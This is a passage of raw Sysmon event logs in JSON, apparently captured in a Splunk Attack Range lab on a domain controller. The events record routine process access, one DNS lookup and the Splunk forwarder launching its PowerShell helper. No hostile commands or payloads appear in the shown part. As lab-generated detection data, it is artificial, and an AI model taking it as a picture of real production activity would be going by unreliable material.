06:51:58.444","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4134,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:58.444\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-110E-5F25-0000-00100CF20500}\r\nTargetProcessId: 4156\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-perfmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:58.444","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-110E-5F25-0000-00100CF20500}","TargetProcessId":"4156","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-perfmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":4135,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:56.905\r\nProcessGuid: {E2A3D6B1-110B-5F25-0000-00104ED30500}\r\nProcessId: 3884\r\nQueryName: win-dc-8400769.attackrange.local\r\nQueryStatus: 0\r\nQueryResults: 10.0.1.14;\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:51:56.905","ProcessGuid":"{E2A3D6B1-110B-5F25-0000-00104ED30500}","QueryName":"win-dc-8400769.attackrange.local","QueryStatus":"0","QueryResults":"10.0.1.14;","Image":"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe","EventReceivedTime":"2020-08-01 06:51:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4136,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:59.118\r\nProcessGuid: {E2A3D6B1-110F-5F25-0000-0010D2F30500}\r\nProcessId: 4300\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:59.118","ProcessGuid":"{E2A3D6B1-110F-5F25-0000-0010D2F30500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:51:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4137,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:59.117\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-110F-5F25-0000-0010D2F30500}\r\nTargetProcessId: 4300\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:59.117","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-110F-5F25-0000-0010D2F30500}","TargetProcessId":"4300","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4138,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:59.117\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-110F-5F25-0000-0010D2F30500}\r\nTargetProcessId: 4300\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:59.117","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-110F-5F25-0000-0010D2F30500}","TargetProcessId":"4300","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4139,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:59.117\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:59.117","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4140,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:59.117\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:59.117","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4141,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:59.117\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:59.117","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4142,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:59.117\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:59.117","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\